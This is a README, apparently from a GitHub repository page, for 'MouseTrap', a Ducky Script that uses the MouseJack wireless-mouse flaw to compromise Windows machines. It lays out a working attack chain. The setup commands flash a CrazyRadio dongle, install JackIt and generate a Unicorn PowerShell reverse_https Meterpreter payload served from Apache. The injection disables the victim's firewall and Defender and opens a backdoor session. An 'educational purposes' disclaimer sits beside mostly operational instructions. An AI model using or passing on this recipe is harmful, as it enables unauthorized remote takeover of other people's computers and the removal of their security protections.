4dvn / MouseTrap

Backdoor Ducky Script using MouseJack exploit and JackIt exploit code

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool


This is an implementation of Bastille's exploit MouseJack using JackIt's exploit code. Full credit goes to them for discovering this issue and writing the libraries to work with the CrazyRadio PA dongle, as well as the implementation that I have created a Ducky Script for. For more information about the vulnerability, as well as vulnerable devices, check out their Github repositories! I do not promote the use of this software maliciously. This is solely for educational purposes!

What is MouseTrap?

MouseTrap is a Ducky Script I have written for MouseJack that allows a user to disable Windows firewalls and Windows Defender real-time protection, and install a backdoor remotely through a victim's wireless mouse. In roughly 10 seconds, you can have a meterpreter session running without firewall interruption.


Tested on a clean Kali Linux VM with a Crazy Radio PA


Flashes CrazyRadio PA dongle with firmware and sets up dependencies

sudo git clone https://github.com/BastilleResearch/mousejack.git
sudo apt-get install sdcc binutils python python-pip
sudo pip install -U pip
sudo pip install -U -I pyusb
sudo pip install -U platformio
cd mousejack
git submodule init
git submodule update
cd nrf-research-firmware
sudo make install


Used to scan for vulnerable devices and inject payload

sudo git clone https://github.com/insecurityofthings/jackit.git
cd jackit
pip install -e .


Develops Powershell payload and sets up Metasploit Meterpreter session

sudo git clone https://github.com/trustedsec/unicorn.git
cd unicorn
python unicorn.py windows/meterpreter/reverse_https <LHOST IP> <LPORT>
mv powershell_attack.txt /var/www/html/
service apache2 start
msfconsole -r unicorn.rc


For this payload to work, the victim must have admin privileges on their device. In order to optimize the speed of the payload, I created a web server on my local machine that the script downloads the Powershell payload from and executes. It is not necessary; however, recommended. In order for the script to install the payload, edit the <LHOST> in my nofirewallallhack file with your machine's IP address. When I tested the attack, both my machine and the victim's were on the same local network. Once the webserver is up and running with the Powershell payload, execute the command:

sudo jackit --script nofirewallallhack

Once the program has begun, it will scan for nearby devices. When you have identified your victim's device, hit Ctrl+C and select the device. The program will begin to inject the script, which will take roughly 10 seconds. Once the script has completed, a Meterpreter session should begin in Metasploit.


Backdoor Ducky Script using MouseJack exploit and JackIt exploit code

License:MIT License